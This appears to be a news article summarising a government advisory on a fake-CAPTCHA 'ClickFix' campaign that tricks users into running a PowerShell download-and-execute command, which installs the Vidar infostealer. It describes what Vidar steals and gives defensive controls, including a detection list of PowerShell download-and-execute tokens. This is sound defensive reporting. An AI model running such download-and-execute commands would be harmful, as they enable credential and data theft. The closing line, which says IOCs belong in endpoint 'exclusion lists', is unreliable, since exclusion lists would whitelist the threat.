Australia ACSC Warns of ClickFix Campaign Delivering Vidar Infostealer — Fake CAPTCHA Bypass Technique Targeting Enterprise Users

The Australian Cyber Security Centre has issued a threat advisory warning organisations about an active ClickFix social engineering campaign delivering the Vidar infostealer to enterprise targets across multiple Australian industry sectors. The advisory provides TTPs and indicators relevant to the campaign, which has been active across English-speaking markets.

How ClickFix Works

ClickFix is a social engineering technique, not a vulnerability. It does not rely on software exploits or browser flaws — it relies on instructing victims to execute a malicious command voluntarily. The attack flow typically unfolds as follows:

1. The user visits a compromised or attacker-controlled website (often reached via search engine result, malvertising, or phishing link)
2. The page presents a convincing overlay — either a fake CAPTCHA verification, a browser “fix required” dialog, or a document rendering failure message
3. The overlay instructs the user to press Win+R (or open Terminal on macOS), paste a command from the clipboard (pre-populated by the page’s JavaScript), and press Enter
4. The pasted command is a PowerShell one-liner that downloads and executes the malware payload

The technique is effective because it exploits users’ familiarity with CAPTCHA verification as a normal web interaction, and because executing the command themselves bypasses most browser-based file download warnings and endpoint security controls that trigger on file downloads rather than in-memory script execution.

Vidar Infostealer Payload

Vidar is a well-established commercial infostealer available as malware-as-a-service. Once executed, it collects:

• Stored browser credentials (Chrome, Edge, Firefox, Brave) including saved passwords and session cookies
• Credit card data stored in browsers
• Cryptocurrency wallet files and seed phrases
• Documents matching specified extensions (PDF, DOC, XLSX) from the user’s desktop and documents folder
• Screenshots of the active desktop at time of execution
• System and network information for operator reconnaissance

Vidar exfiltrates collected data to attacker-controlled infrastructure and then self-deletes, making forensic detection difficult after the collection phase.

Defensive Response

User awareness is the primary control. ClickFix cannot succeed if users understand that no legitimate website requires them to run a PowerShell command or open a Run dialog. Security awareness training should explicitly cover the ClickFix pattern — the fake CAPTCHA is the distinguishing indicator.

Technical controls:

1. Constrained Language Mode for PowerShell — apply PowerShell Constrained Language Mode via AppLocker or WDAC (Windows Defender Application Control) on endpoints. This prevents unsigned scripts and certain download-and-execute patterns even when a user initiates the PowerShell session.

2. Block the Win+R / Run dialog in managed environments. Group Policy can be used to disable the Run dialog for standard users. This removes the primary interaction mechanism ClickFix uses on Windows.

3. Monitor for PowerShell invocations that include IEX, Invoke-Expression, DownloadString, or Net.WebClient — these patterns are characteristic of ClickFix payload download one-liners.

4. Web proxy content filtering — block access to newly registered domains and domains with poor reputation scores. ClickFix infrastructure typically uses recently registered domains that have short operational lifespans.

5. Endpoint detection — configure EDR rules to flag process creation chains where powershell.exe is a child process of explorer.exe or cmd.exe with suspicious command-line arguments.

The ACSC advisory includes specific indicators of compromise — IOCs should be added to endpoint protection exclusion lists and network monitoring rules for affected organisations.